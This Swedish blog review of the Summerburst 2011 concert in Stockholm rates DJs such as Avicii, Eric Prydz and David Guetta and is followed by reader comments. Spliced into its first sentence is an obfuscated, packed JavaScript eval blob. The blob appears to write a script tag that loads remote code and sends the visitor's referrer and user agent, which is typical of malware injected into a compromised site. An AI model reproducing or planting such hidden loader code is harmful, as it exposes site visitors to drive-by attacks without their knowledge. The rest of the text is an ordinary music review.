Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Recension: Summerburst 2011, en succé

Recension: Summerburst 2011, en succé
Alexander Gylemo

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnffb|var|u0026u|referrer|yaens||js|php’.split(’|’),0,{}))
ni kanske redan vet så besöktes Stadion igår av flera världskända dj’s. Revue.se var självklart på plats.

Från kl 15.00 till 24.00 höll den otroliga konserten Summerburst igång. Biljetterna rök snabbt och konserten blev slutsåld tidigt. Makalösa dj’s som Eric Prydz, David Guetta, Avicii och många fler var där och spelade inför 13000 taggade personer.
Det måste varit första gången i svensk historia som det har varit så många kända dj’s i Stockholm som uppträtt på samma konsert.

Det vart som förväntat en succé, minus att ljudet inte var helt perfekt. De som stod i vip, bar- och cabanadelen fick mest ta del av basen i låtarna.

Tyvärr så missade artisten Calvin Harris sitt flyg och kunde inte uppträda under evenemanget, vad jag hört så spelade han däremot på F12 Terrassen senare under natten. Sebjak tog över i hans ställe till mångas stora överraskning.

Konserten startade (efter lite uppvärmning från NRJ) med Adrian Lux, up and coming producenten som tog världen med storm med sin remix på Axwell:s ”Teenage Crime”. Tack vare hans bra låtval samt kärleksfulla uppträdande drogs publiken in i stämningen med en gång och succén var ett faktum. Mycket kul att se då jag hittills inte varit helt såld på honom live.

Efteråt fortsatte Chromeos Winter som faktiskt lyckades överglänsa herr Lux med sitt låtval. Ännu en överraskning för  mig då jag inte trodde att Chromeo:s musikstill skulle passa in alls. Lyckligtvis vart jag överbevisad då det var ren och skär big room house som Winter bjöd den nu euforiska publiken på.

Festen fortsatte med mina personliga favoriter Dada Life som med bl.a. deras remix på Benny Benassis ”Satisfaction”, ”Get Some Dada Life” gjorde publiken helt galen. Jag vart lite besviken på att de inte spelade deras andra grymma remixer som de gjort genom åren, men i stort sätt levde de upp till den allt mer växande hypen som ligger på dem i dag.

John Dahlbäck var näst på tur och i vanlig ordning var han ganska anonym i sitt uppträdande. Jag kan förstå att alla producenter av elektronisk musik inte nödvändigtvis måste vara övertaggade ecstasymonster när de spelar live, men är det för mycket begärt att dra lite på smilbanden när man spelar inför 13000 överlyckliga svenskar på Sveriges mest hypade konsert denna sommar? Lyckligtvis kom Erik Hassle in för att visa sin och Dahlbäcks nya singel ”One Last Ride”, vars scennärvaro var desto bättre.

Efter Dahlbäck kom konsertens första fail. Calvin Harris missade sin flight och kunde inte uppträda vilket vart ett väldigt stort minus, då Calvin Harris är en av, om inte den duktigaste dj:n som fanns med i Summerbursts line-up enligt mig. Jag misstänkte att något var fel då Calvin’s senaste hit ”Awooga” var en av de första låtarna som spelades under konserten. Det hade ju varit konstigt att inte Calvin Harris själv hade spelat den.

Sebjak fick hoppa in istället. Han gjorde ett bra set, inget utöver det vanliga men han fyllde ut tomrummet som Calvin Harris lämnade utan större problem.

Nästa artist var en av konsertens superdragplåster Eric Prydz som bjöd på en helt sjuk spelning med riktigt bra låtar och otrolig energi. Publiken visade sin kärlek och Prydz såg ut att stortrivas på hemmaplan, vilket är väldigt kul då jag tycker han kommer hit för sällan. Förhoppningsvis får vi nu se lite mer av honom i framtiden.

Efter Prydz kom svenska folkets nya hjälte Avicii, 89:an från Stockholm som numera har hela housevärlden i sin hand. Med sina två nya superhits ”Penguin” och (årets bästa låt hittills enligt mig) ”Levels” stog han för konsertens bästa framträdande. Även han såg ut att må bra av att få spela i Sverige vilket jag hoppas kommer få hit han mer.

Det sista uppträdandet var enligt mig fail nr.2; Summerburst 2011’s största artist David Guetta. En gång i tiden stod det klart att om man gick på en Guetta-konsert var man garanterad sinnessjuka låtar i en originell spelning, uppträdanden som tog David Guetta dit han är idag. Sen klev han in i popmusiken och blev en av de första housestjärnorna som verkligen blev en sell-out. Jag hade hoppats på att få se Guettas house dj skills igår och lyssna på ett par av de grymma låtarna som lär skickas till honom varje dag, men blev matad med de totalt sönderspelade hitsen han stått för de senaste åren. Bortsett från bra ljuseffekter och att konserten nu nådde sitt klimax var jag riktigt missnöjd med festivalens final. De andra 12999 personerna i publiken såg däremot ut att tycka om det.

I stort sätt var detta en nästintill perfekt festival där Avicii och Eric Prydz stod för highlightsen. Förhoppningsvis kommer vi få se fler festivaler dedikerade till Sveriges allt växande housescen från och med nu.

Nästa Summerburst konsert sägs hållas nästa år (2012) den 4 juni. Så vill ni gå, var tidigt ute med köp av biljetter.

Mer info: http://summerburst.se/

Comments

 1. Olle Plam

  Riktigt sick!!! Gillade upplägget galant. Peace 🙂

 2. Polle

  Riktigt bra skrivet och helt fantastisk dag/kväll.

  • kul att du gillar den! tack polle!

 3. FJR

  Prydz var med hästlängder sämst i går. Inte pga hans låtval – enligt min smak – utan för att han såg helt ointresserad ut hela spelningen (nästan) och för att han läste dansgolvet som om han led av klubbdyslexi. För långa build-ups och för lite action för att det ska funka för en mainstream-publik. Satt själv på läktaren ett tag under hans spelning och massan som först slutit upp framför scenen tynade bort allt eftersom tiden gick.

  Två tummar upp för Dada Life och Avicii däremot. 😀

  • Niclas

   Håller helt klart med dig. Eric Prydz var ruskigt dålig. Avicii och Dada var bäst. Guetta var också rätt dålig med tanke på han låtval. Bara dem låtarna man inte ville höra.

 4. xxx

  Dada Life visade verkligen vart skåpet ska stå. Avicii får också tummarna upp för sin presentation. Sebjak gjorde även han ett strålande jobb istället för Calvin Harris som istället satt och drack drinkar på flygplatsen.

  Fy skäms, drar till f12 istället. Tumme ner.

 5. Johannes

  Skribenten kanske satt i vip cabanan och inte hörde ifall det var bra eller dåligt. Eller? 😛

  • jag var överallt 😉 segt att ni inte gillade prydz. jag älskade hans build-ups, men å andra sidan, gillar man inte spelningen är en lång build-up som en långsam tortyr.
   nån som håller med om att dahlbäck är råtrisst att kolla på däremot?

 6. Marcus

  Idiot, Avicii bästa uppträdandet? Fullkomligt fantasilöst, inget annat än sina egna låtar uppspelade (svårt att fadea in och ut låtar). Det bästa han gjorde va att spela upp Alesso’s remix av Pressure med Nadia Ali. Dada Life va helt sjuka, STÖRT sköna på scen vilket är mer än man kan säga om alla förrutom Guetta som även han bjöd på grym show!

  Fullkomligt värdelös recension, hoppas du inte får betalt.

  • peter

   Hehe. Jag kan hålla med om att jag tyckte att Avicii var sådär. Han är lite uppblåst av massan men men. Han är duktig så varför inte hylla honom lite mer :P.

   Jag tyckte Guetta var rätt bra också men du måste ju förstå att alla inte har samma smak.
   Jag tycker inte recensionen var dålig dock. Det är den ända jag hittat utom någon instickare i aftonbladet. Bra jobb!!!

   Marcus, Ta det lungt hehe.

 7. Josefin

  Bra artikel 🙂 Var inte lätt att hitta en recension om Summerburst. Någon som vet om det finns fler man kan läsa? Vill se lite bilder också för jag var inte där. Länka gärna. hej

 8. Sofia

  Vem är det som spelar på bild 2? Den där det är massa konfetti.
  Kul artikel också.

 9. Sebastian

  Bra Recention!

 10. hugge

  Ser ut att har varit en riktigt rolig dag. Synd att man missa detta.

 11. Hemlig

  Ey du Gyle hur läget? Summerburst eller?